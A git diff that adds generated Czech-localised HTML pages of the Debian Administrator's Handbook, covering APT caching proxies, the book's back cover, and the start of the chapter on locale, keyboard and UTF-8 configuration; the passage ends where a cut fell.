+                  class="emphasis"><em>debian.net</em></span> domain is not an official resource of the Debian project. Each Debian developer may use that domain name for their own use. These websites can contain unofficial services (sometimes personal sites) hosted on a machine which does not belong to the project and set up by Debian developers, or even prototypes about to be moved on to <span
+                  class="emphasis"><em>debian.org</em></span>. Two reasons can explain why some of these prototypes remain on <span
+                  class="emphasis"><em>debian.net</em></span>: either no one has made the necessary effort to transform it into an official service (hosted on the <span
+                  class="emphasis"><em>debian.org</em></span> domain, and with a certain guarantee of maintenance), or the service is too controversial to be officialized.
+			</div></div><div
+              class="para">
+				Installing a package means giving root rights to its creator, because they decide on the contents of the initialization scripts which are run under that identity. Official Debian packages are created by volunteers who have been co-opted and reviewed and who can seal their packages so that their origin and integrity can be checked.
+			</div><div
+              class="para">
+				In general, be wary of a package whose origin you don't know and which isn't hosted on one of the official Debian servers: evaluate the degree to which you can trust the creator, and check the integrity of the package. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://mentors.debian.net/">http://mentors.debian.net/</a></div>
+			</div><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.snapshot.debian.org"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> Old package versions: <code
+                          class="literal">snapshot.debian.org</code></strong></p></div></div></div><a
+                id="id-1.9.10.10.8.2"
+                class="indexterm"></a><div
+                class="para">
+				The <code
+                  class="literal">snapshot.debian.org</code> service, introduced in April 2010, can be used to “go backwards in time” and to find an old version of a package. It can be used for example to identify which version of a package introduced a regression, and more concretely, to come back to the former version while waiting for the regression fix.
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.9.10.11"></a>6.1.6. Caching Proxy for Debian Packages</h3></div></div></div><a
+              id="id-1.9.10.11.2"
+              class="indexterm"></a><a
+              id="id-1.9.10.11.3"
+              class="indexterm"></a><div
+              class="para">
+				When an entire network of machines is configured to use the same remote server to download the same updated packages, any administrator knows that it would be beneficial to have an intermediate proxy acting as a network-local cache (see sidebar <a
+                class="xref"
+                href="sect.apt-cache.html#sidebar.cache"><span
+                  class="emphasis"><em>VOCABULARY</em></span> Cache</a>).
+			</div><div
+              class="para">
+				You can configure APT to use a "standard" proxy (see <a
+                class="xref"
+                href="sect.apt-get.html#sect.apt-config">6.2.4 – „Configuration Options“</a> for the APT side, and <a
+                class="xref"
+                href="sect.http-ftp-proxy.html">11.6 – „HTTP/FTP Proxy“</a> for the proxy side), but the Debian ecosystem offers better options to solve this problem. The dedicated software presented in this section are smarter than a plain proxy cache because they can rely on the specific structure of APT repositories (for instance they know when individual files are obsolete or not, and thus adjust the time during which they are kept).
+			</div><a
+              id="id-1.9.10.11.6"
+              class="indexterm"></a><a
+              id="id-1.9.10.11.7"
+              class="indexterm"></a><div
+              class="para">
+				<span
+                class="pkg pkg">apt-cacher</span> and <span
+                class="pkg pkg">apt-cacher-ng</span> work like usual proxy cache servers. APT's <code
+                class="filename">sources.list</code> is left unchanged, but APT is configured to use them as proxy for outgoing requests.
+			</div><a
+              id="id-1.9.10.11.9"
+              class="indexterm"></a><div
+              class="para">
+				<span
+                class="pkg pkg">approx</span>, on the other hand, acts like an HTTP server that “mirrors” any number of remote repositories in its top-level URLs. The mapping between those top-level directories and the remote URLs of the repositories is stored in <code
+                class="filename">/etc/approx/approx.conf</code>:
+			</div><pre
+              class="programlisting">
+# &lt;name&gt; &lt;repository-base-url&gt;
+debian   http://deb.debian.org/debian
+security http://security.debian.org
+</pre><div
+              class="para">
+				<span
+                class="pkg pkg">approx</span> runs by default on port 9999 via a systemd socket and requires the users to adjust their <code
+                class="filename">sources.list</code> file to point to the approx server:
+			</div><pre
+              class="programlisting"># Sample sources.list pointing to a local approx server
+deb http://apt.falcot.com:9999/security stretch/updates main contrib non-free
+deb http://apt.falcot.com:9999/debian stretch main contrib non-free
+</pre></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.coexistence-with-other-packaging-systems.html"><strong>Předcházející</strong>5.5. Coexistence with Other Packaging Systems</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.apt-get.html"><strong>Další</strong>6.2. aptitude, apt-get, and apt Commands</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/backcover.html b/tmp/cs-CZ/html/backcover.html
new file mode 100644
index 000000000..049bd49cb
--- /dev/null
+++ b/tmp/cs-CZ/html/backcover.html
@@ -0,0 +1,99 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Příloha C. The Debian Administrator's Handbook</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.user-space.html"
+        title="B.5. The User Space" /><link
+        rel="next"
+        href="website.html"
+        title="Příloha D. Get the book" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/backcover.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.user-space.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="website.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="appendix"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="backcover"></a>Příloha C. The Debian Administrator's Handbook</h1></div><div><h3
+                class="subtitle"><em>Debian Jessie from Discovery to Mastery</em></h3></div></div></div><div
+          class="para">
+		Debian GNU/Linux, a very popular non-commercial Linux distribution, is known for its reliability and richness. Built and maintained by an impressive network of thousands of developers throughout the world, the Debian project is cemented by its social contract. This foundation text defines the project's objective: fulfilling the needs of users with a 100% free operating system. The success of Debian and of its ecosystem of derivative distributions (with Ubuntu at the forefront) means that an increasing number of administrators are exposed to Debian's technologies.
+	</div><div
+          class="para">
+		This Debian Administrator's Handbook, which has been entirely updated for Debian 8 “Jessie”, builds on the success of its 6 previous editions. Accessible to all, this book teaches the essentials to anyone who wants to become an effective and independent Debian GNU/Linux administrator. It covers all the topics that a competent Linux administrator should master, from installation to updating the system, creating packages and compiling the kernel, but also monitoring, backup and migration, without forgetting advanced topics such as setting up SELinux or AppArmor to secure services, automated installations, or virtualization with Xen, KVM or LXC.
+	</div><div
+          class="para">
+		This book is not only designed for professional system administrators. Anyone who uses Debian or Ubuntu on their own computer is de facto an administrator and will find tremendous value in knowing more about how their system works. Being able to understand and resolve problems will save you invaluable time.
+	</div><div
+          class="para">
+		<span
+            class="strong strong"><strong>Raphaël Hertzog</strong></span> is a computer science engineer who graduated from the National Institute of Applied Sciences (INSA) in Lyon, France, and has been a Debian developer since 1997. The founder of Freexian, the first French IT services company specialized in Debian GNU/Linux, he is one of the most prominent contributors to this Linux distribution.
+	</div><div
+          class="para">
+		<span
+            class="strong strong"><strong>Roland Mas</strong></span> is a telecommunications engineer who graduated from the National Superior School of Telecommunications (ENST) in Paris, France. A Debian developer since 2000 as well as the developer of the FusionForge software, he works as a freelance consultant who specializes in the installation and migration of Debian GNU/Linux systems and in setting up collaborative work tools.
+	</div><div
+          class="para">
+		This book has a story. It started its life as a French-language book (Cahier de l'Admin Debian published by Eyrolles) and has been translated into English thanks to hundreds of persons who contributed to a fundraising. Learn more at https://debian-handbook.info, where you can also obtain an electronic version of this book.
+	</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.user-space.html"><strong>Předcházející</strong>B.5. The User Space</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="website.html"><strong>Další</strong>Příloha D. Get the book</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/basic-configuration.html b/tmp/cs-CZ/html/basic-configuration.html
new file mode 100644
index 000000000..334b016ba
--- /dev/null
+++ b/tmp/cs-CZ/html/basic-configuration.html
@@ -0,0 +1,417 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 8. Basic Configuration: Network, Accounts, Printing...</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.common-procedures.html"
+        title="7.2. Common Procedures" /><link
+        rel="next"
+        href="sect.network-config.html"
+        title="8.2. Configuring the Network" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/basic-configuration.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.common-procedures.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.network-config.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="basic-configuration"></a>Kapitola 8. Basic Configuration: Network, Accounts, Printing...</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="basic-configuration.html#sect.config-language-support">8.1. Configuring the System for Another Language</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="basic-configuration.html#sect.default-language">8.1.1. Setting the Default Language</a></span></dt><dt><span
+                    class="section"><a
+                      href="basic-configuration.html#sect.keyboard-config">8.1.2. Configuring the Keyboard</a></span></dt><dt><span
+                    class="section"><a
+                      href="basic-configuration.html#sect.utf8-migration">8.1.3. Migrating to UTF-8</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.network-config.html">8.2. Configuring the Network</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.interface-ethernet">8.2.1. Ethernet Interface</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.interface-wireless">8.2.2. Wireless Interface</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.ppp-rtc">8.2.3. Connecting with PPP through a PSTN Modem</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.adsl">8.2.4. Connecting through an ADSL Modem</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.network-config.html#sect.roaming-network-config">8.2.5. Automatic Network Configuration for Roaming Users</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.hostname-name-service.html">8.3. Setting the Hostname and Configuring the Name Service</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.hostname-name-service.html#sect.name-resolution">8.3.1. Name Resolution</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.user-group-databases.html">8.4. User and Group Databases</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.etc-passwd">8.4.1. User List: <code
+                        class="filename">/etc/passwd</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.etc-shadow">8.4.2. The Hidden and Encrypted Password File: <code
+                        class="filename">/etc/shadow</code></a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.account-modification">8.4.3. Modifying an Existing Account or Password</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.disabling-account">8.4.4. Disabling an Account</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.user-group-databases.html#sect.etc-group">8.4.5. Group List: <code
+                        class="filename">/etc/group</code></a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.creating-accounts.html">8.5. Creating Accounts</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.shell-environment.html">8.6. Shell Environment</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.config-printing.html">8.7. Printer Configuration</a></span></dt><dt><span
+                class="section"><a
+                  href="sect.config-bootloader.html">8.8. Configuring the Bootloader</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html#sect.identify-disks">8.8.1. Identifying the Disks</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html#sect.config-lilo">8.8.2. Configuring LILO</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html#sect.config-grub">8.8.3. GRUB 2 Configuration</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-bootloader.html#sect.config-yaboot">8.8.4. For Macintosh Computers (PowerPC): Configuring Yaboot</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.config-misc.html">8.9. Other Configurations: Time Synchronization, Logs, Sharing Access…</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.timezone">8.9.1. Timezone</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.time-synchronization">8.9.2. Time Synchronization</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.rotation-logs">8.9.3. Rotating Log Files</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.sharing-admin-rights">8.9.4. Sharing Administrator Rights</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.fstab-mount-points">8.9.5. List of Mount Points</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.config-misc.html#sect.locate-updatedb">8.9.6. <code
+                        class="command">locate</code> and <code
+                        class="command">updatedb</code></a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.kernel-compilation.html">8.10. Compiling a Kernel</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.kernel-compilation-prerequisites">8.10.1. Introduction and Prerequisites</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.kernel-sources">8.10.2. Getting the Sources</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.config-kernel">8.10.3. Configuring the Kernel</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.kernel-build">8.10.4. Compiling and Building the Package</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.modules-build">8.10.5. Compiling External Modules</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-compilation.html#sect.kernel-patch">8.10.6. Applying a Kernel Patch</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.kernel-installation.html">8.11. Installing a Kernel</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.kernel-installation.html#sect.kernel-package">8.11.1. Features of a Debian Kernel Package</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.kernel-installation.html#sect.kernel-installation-with-dpkg">8.11.2. Installing with <code
+                        class="command">dpkg</code></a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		A computer with a new installation created with <code
+              class="command">debian-installer</code> is intended to be as functional as possible, but many services still have to be configured. Furthermore, it is always good to know how to change certain configuration elements defined during the initial installation process.
+	</div></div><div
+          class="para">
+		This chapter reviews everything included in what we could call the “basic configuration”: networking, language and locales, users and groups, printing, mount points, etc.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.config-language-support"></a>8.1. Configuring the System for Another Language</h2></div></div></div><a
+            id="id-1.11.5.2"
+            class="indexterm"></a><div
+            class="para">
+			If the system was installed using French, the machine will probably already have French set as the default language. But it is good to know what the installer does to set the language, so that later, if the need arises, you can change it.
+		</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>TOOL</em></span> The <code
+                        class="command">locale</code> command to display the current configuration</strong></p></div></div></div><div
+              class="para">
+			The <code
+                class="command">locale</code> command lists a summary of the current configuration of various locale parameters (date format, numbers format, etc.), presented in the form of a group of standard environment variables dedicated to the dynamic modification of these settings.
+		</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.default-language"></a>8.1.1. Setting the Default Language</h3></div></div></div><a
+              id="id-1.11.5.5.2"
+              class="indexterm"></a><a
+              id="id-1.11.5.5.3"
+              class="indexterm"></a><a
+              id="id-1.11.5.5.4"
+              class="indexterm"></a><div
+              class="para">
+				A locale is a group of regional settings. This includes not only the language for text, but also the format for displaying numbers, dates, times, and monetary sums, as well as the alphabetical comparison rules (to properly account for accented characters). Although each of these parameters can be specified independently from the others, we generally use a locale, which is a coherent set of values for these parameters corresponding to a “region” in the broadest sense. These locales are usually indicated under the form, <code
+                class="literal"><em
+                  class="replaceable">language-code</em>_<em
+                  class="replaceable">COUNTRY-CODE</em></code>, sometimes with a suffix to specify the character set and encoding to be used. This enables consideration of idiomatic or typographical differences between different regions with a common language.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> Character sets</strong></p></div></div></div><a
+                id="id-1.11.5.5.6.2"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.3"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.4"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.5"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.6"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.7"
+                class="indexterm"></a><div
+                class="para">
+				Historically, each locale has an associated “character set” (group of known characters) and a preferred “encoding” (internal representation for characters within the computer).
+			</div><div
+                class="para">
+				The most popular encodings for latin-based languages were limited to 256 characters because they opted to use a single byte for each character. Since 256 characters was not enough to cover all European languages, multiple encodings were needed, and that is how we ended up with <span
+                  class="emphasis"><em>ISO-8859-1</em></span> (also known as “Latin 1”) up to <span
+                  class="emphasis"><em>ISO-8859-15</em></span> (also known as “Latin 9”), among others.
+			</div><div
+                class="para">
+				Working with foreign languages often implied regular switches between various encodings and character sets. Furthermore, writing multilingual documents led to further, almost intractable problems. Unicode (a super-catalog of nearly all writing systems from all of the world's languages) was created to work around this problem. One of Unicode's encodings, UTF-8, retains all 128 ASCII symbols (7-bit codes), but handles other characters differently. Those are preceded by a specific escape sequence of a few bits, which implicitly defines the length of the character. This allows encoding all Unicode characters on a sequence of one or more bytes. Its use has been popularized by the fact that it is the default encoding in XML documents.
+			</div><a
+                id="id-1.11.5.5.6.11"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.12"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.6.13"
+                class="indexterm"></a><div
+                class="para">
+				This is the encoding that should generally be used, and is thus the default on Debian systems.
+			</div></div><div
+              class="para">
+				The <span
+                class="pkg pkg">locales</span> package includes all the elements required for proper functioning of “localization” of various applications. During installation, this package will ask to select a set of supported languages. This set can be changed at any time by running <code
+                class="command">dpkg-reconfigure locales</code> as root.
+			</div><div
+              class="para">
+				The first question invites you to select “locales” to support. Selecting all English locales (meaning those beginning with “<code
+                class="literal">en_</code>”) is a reasonable choice. Do not hesitate to also enable other locales if the machine will host foreign users. The list of locales enabled on the system is stored in the <code
+                class="filename">/etc/locale.gen</code> file. It is possible to edit this file by hand, but you should run <code
+                class="command">locale-gen</code> after any modifications. It will generate the necessary files for the added locales to work, and remove any obsolete files.
+			</div><div
+              class="para">
+				The second question, entitled “Default locale for the system environment”, requests a default locale. The recommended choice in the U.S.A. is “<code
+                class="literal">en_US.UTF-8</code>”. British English speakers will prefer “<code
+                class="literal">en_GB.UTF-8</code>”, and Canadians will prefer either “<code
+                class="literal">en_CA.UTF-8</code>” or, for French, “<code
+                class="literal">fr_CA.UTF-8</code>”. The <code
+                class="filename">/etc/default/locale</code> file will then be modified to store this choice. From there, it is picked up by all user sessions since PAM will inject its content in the <code
+                class="varname">LANG</code> environment variable.
+			</div><a
+              id="id-1.11.5.5.10"
+              class="indexterm"></a><a
+              id="id-1.11.5.5.11"
+              class="indexterm"></a><a
+              id="id-1.11.5.5.12"
+              class="indexterm"></a><div
+              class="sidebar"><a
+                xmlns=""
+                id="sidebar.intro-pam"></a><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>BEHIND THE SCENES</em></span> <code
+                          class="filename">/etc/environment</code> and <code
+                          class="filename">/etc/default/locale</code></strong></p></div></div></div><div
+                class="para">
+				The <code
+                  class="filename">/etc/environment</code> file provides the <code
+                  class="command">login</code>, <code
+                  class="command">gdm</code>, or even <code
+                  class="command">ssh</code> programs with the correct environment variables to be created.
+			</div><div
+                class="para">
+				These applications do not create these variables directly, but rather via a PAM (<code
+                  class="filename">pam_env.so</code>) module. PAM (Pluggable Authentication Module) is a modular library centralizing the mechanisms for authentication, session initialization, and password management. See <a
+                  class="xref"
+                  href="sect.ldap-directory.html#sect.config-pam">11.7.3.2 – „Configuring PAM“</a> for an example of PAM configuration.
+			</div><div
+                class="para">
+				The <code
+                  class="filename">/etc/default/locale</code> file works in a similar manner, but contains only the <code
+                  class="varname">LANG</code> environment variable. Thanks to this split, some PAM users can inherit a complete environment without localization. Indeed, it is generally discouraged to run server programs with localization enabled; on the other hand, localization and regional settings are recommended for programs that open user sessions.
+			</div><a
+                id="id-1.11.5.5.13.5"
+                class="indexterm"></a><a
+                id="id-1.11.5.5.13.6"
+                class="indexterm"></a></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.keyboard-config"></a>8.1.2. Configuring the Keyboard</h3></div></div></div><a
+              id="id-1.11.5.6.2"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.3"
+              class="indexterm"></a><div
+              class="para">
+				Even if the keyboard layout is managed differently in console and graphical mode, Debian offers a single configuration interface that works for both: it is based on debconf and is implemented in the <span
+                class="pkg pkg">keyboard-configuration</span> package. Thus the <code
+                class="command">dpkg-reconfigure keyboard-configuration</code> command can be used at any time to reset the keyboard layout.
+			</div><a
+              id="id-1.11.5.6.5"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.6"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.7"
+              class="indexterm"></a><div
+              class="para">
+				<a
+                id="id-1.11.5.6.8.1"
+                class="indexterm"></a>The questions are relevant to the physical keyboard layout (a standard PC keyboard in the US will be a “Generic 104 key”), then the layout to choose (generally “US”), and then the position of the AltGr key (right Alt). Finally comes the question of the key to use for the “Compose key”, which allows for entering special characters by combining keystrokes. Type successively <span
+                class="keycap"><strong>Compose</strong></span> <span
+                class="keycap"><strong>'</strong></span> <span
+                class="keycap"><strong>e</strong></span> and produce an e-acute (“é”). All these combinations are described in the <code
+                class="filename">/usr/share/X11/locale/en_US.UTF-8/Compose</code> file (or another file, determined according to the current locale indicated by <code
+                class="filename">/usr/share/X11/locale/compose.dir</code>).
+			</div><a
+              id="id-1.11.5.6.9"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.10"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.11"
+              class="indexterm"></a><a
+              id="id-1.11.5.6.12"
+              class="indexterm"></a><div
+              class="para">
+				Note that the keyboard configuration for graphical mode described here only affects the default layout; the GNOME and KDE Plasma environments, among others, provide a keyboard control panel in their preferences allowing each user to have their own configuration. Some additional options regarding the behavior of some particular keys are also available in these control panels.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="sect.utf8-migration"></a>8.1.3. Migrating to UTF-8</h3></div></div></div><div
+              class="para">
+				The generalization of UTF-8 encoding has been a long awaited solution to numerous difficulties with interoperability, since it facilitates international exchange and removes the arbitrary limits on characters that can be used in a document. The one drawback is that it had to go through a rather difficult transition phase. Since it could not be completely transparent (that is, it could not happen at the same time all over the world), two conversion operations were required: one on file contents, and the other on filenames. Fortunately, the bulk of this migration has been completed and we discuss it largely for reference.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>CULTURE</em></span> <span
+                          class="foreignphrase"><em
+                            class="foreignphrase">Mojibake</em></span> and interpretation errors</strong></p></div></div></div><div
+                class="para">
+				When a text is sent (or stored) without encoding information, it is not always possible for the recipient to know with certainty what convention to use for determining the meaning of a set of bytes. You can usually get an idea by getting statistics on the distribution of values present in the text, but that doesn't always give a definite answer. When the encoding system chosen for reading differs from that used in writing the file, the bytes are mis-interpreted, and you get, at best, errors on some characters, or, at worst, something completely illegible.
+			</div><div
+                class="para">
+				Thus, if a French text appears normal with the exception of accented letters and certain symbols which appear to be replaced with sequences of characters like “é” or è” or “ç”, it is probably a file encoded as UTF-8 but interpreted as ISO-8859-1 or ISO-8859-15. This is a sign of a local installation that has not yet been migrated to UTF-8. If, instead, you see question marks instead of accented letters — even if these question marks seem to also replace a character that should have followed the accented letter — it is likely that your installation is already configured for UTF-8 and that you have been sent a document encoded in Western ISO.
+			</div><div
+                class="para">
+				So much for “simple” cases. These cases only appear in Western culture, since Unicode (and UTF-8) was designed to maximize the common points with historical encodings for Western languages based on the Latin alphabet, which allows recognition of parts of the text even when some characters are missing.
+			</div><div
+                class="para">
+				In more complex configurations, which, for example, involve two environments corresponding to two different languages that do not use the same alphabet, you often get completely illegible results — a series of abstract symbols that have nothing to do with each other. This is especially common with Asian languages due to their numerous languages and writing systems. The Japanese word <span
+                  class="foreignphrase"><em
+                    class="foreignphrase">mojibake</em></span> has been adopted to describe this phenomenon. When it appears, diagnosis is more complex and the simplest solution is often to simply migrate to UTF-8 on both sides.
+			</div></div><div
+              class="para">
+				As far as file names are concerned, the migration can be relatively simple. The <code
+                class="command">convmv</code> tool (in the package with the same name) was created specifically for this purpose; it allows renaming files from one encoding to another. The use of this tool is relatively simple, but we recommend doing it in two steps to avoid surprises. The following example illustrates a UTF-8 environment containing directory names encoded in ISO-8859-15, and the use of <code
+                class="command">convmv</code> to rename them.
+			</div><pre
+              class="screen"><code
+                class="computeroutput">$ </code><strong
+                class="userinput"><code>ls travail/</code></strong>
+<code
+                class="computeroutput">Ic?nes  ?l?ments graphiques  Textes
+$ </code><strong
+                class="userinput"><code>convmv -r -f iso-8859-15 -t utf-8 travail/</code></strong>
+<code
+                class="computeroutput">Starting a dry run without changes...
+mv "travail/�l�ments graphiques"        "travail/Éléments graphiques"
+mv "travail/Ic�nes"     "travail/Icônes"
+No changes to your files done. Use --notest to finally rename the files.
+$ </code><strong
+                class="userinput"><code>convmv -r --notest -f iso-8859-15 -t utf-8 travail/</code></strong>
+<code
+                class="computeroutput">mv "travail/�l�ments graphiques"        "travail/Éléments graphiques"
+mv "travail/Ic�nes"     "travail/Icônes"
+Ready!
+$ </code><strong
+                class="userinput"><code>ls travail/</code></strong>
+<code
+                class="computeroutput">Éléments graphiques  Icônes  Textes</code></pre><div
+              class="para">
